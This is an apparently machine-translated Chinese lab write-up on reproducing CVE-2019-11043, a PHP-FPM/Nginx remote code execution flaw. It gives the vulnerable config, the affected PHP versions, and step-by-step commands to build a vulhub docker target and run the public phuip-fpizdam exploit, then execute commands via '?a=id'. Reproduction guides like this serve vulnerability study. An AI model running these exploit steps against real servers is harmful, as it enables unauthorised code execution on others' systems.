One 、 Vulnerability description

  CVE-2019-11043 It's a Remote Code Execution Vulnerability , Using some specific configuration of Nginx + PHP-FPM There is a vulnerability in our server , Allows attackers to execute code remotely .

   towards Nginx + PHP-FPM Server for URL send out %0a when , The server returned an exception .

   The vulnerability needs to be in nginx.conf Specific configuration in can trigger . The specific configuration is as follows ：

location ~ [^/]\.php(/|$) {
  ...
  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
  fastcgi_param PATH_INFO $fastcgi_path_info;
  fastcgi_pass   php:9000;
  ...
  }

   Attackers can use line breaks （％0a） To destroy fastcgi_split_path_info Directive Regexp. Regexp Damaged, resulting in PATH_INFO It's empty , This triggers the vulnerability .

Two 、 scope

   stay Nginx + PHP-FPM In the environment , When the above... Is enabled Nginx After the configuration , following PHP The version is affected by this vulnerability , in addition ,PHP 5.6 The version is also affected by this vulnerability , But for now, it's just Crash, No remote code execution ：

● PHP 7.0  edition  
● PHP 7.1  edition  
● PHP 7.2  edition  
● PHP 7.3  edition 

3、 ... and 、 Loophole recurrence

   Use P Cow's docker The environment is reproduced ：

  PHP-FPM Remote code execution vulnerability （CVE-2019-11043）

1、 install docker、golang Environmental Science

sudo apt-get install docker docker-compose
sudo apt install golang

2、 Build a loophole environment

git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2019-11043 && docker-compose up -d

​    After starting the environment , You can see the default page of the vulnerability environment . Here is http://127.0.0.1:8080/index.php

3、 Install exploit tools

git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go get -v && go build

   Error reason ： The default is proxy.golang.org, Can't visit... At home

   Change a proxy address that can be accessed in China ：https://goproxy.cn. Re execute the command

go env -w GOPROXY=https://goproxy.cn
go get -v && go build

4、 Exploit

go run . "http://127.0.0.1:8080/index.php"

   visit http://127.0.0.1/index.php?a=id

Be careful , because php-fpm Will start multiple sub processes , During a visit to /index.php?a=id You need to visit more than once , To access the contaminated process .

curl ip.sb by Linux China query public network IP The order of

Four 、 Reference link

• https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043/README.zh-cn.md

• https://github.com/neex/phuip-fpizdam

• https://wolke.cn/post/4f87817f.html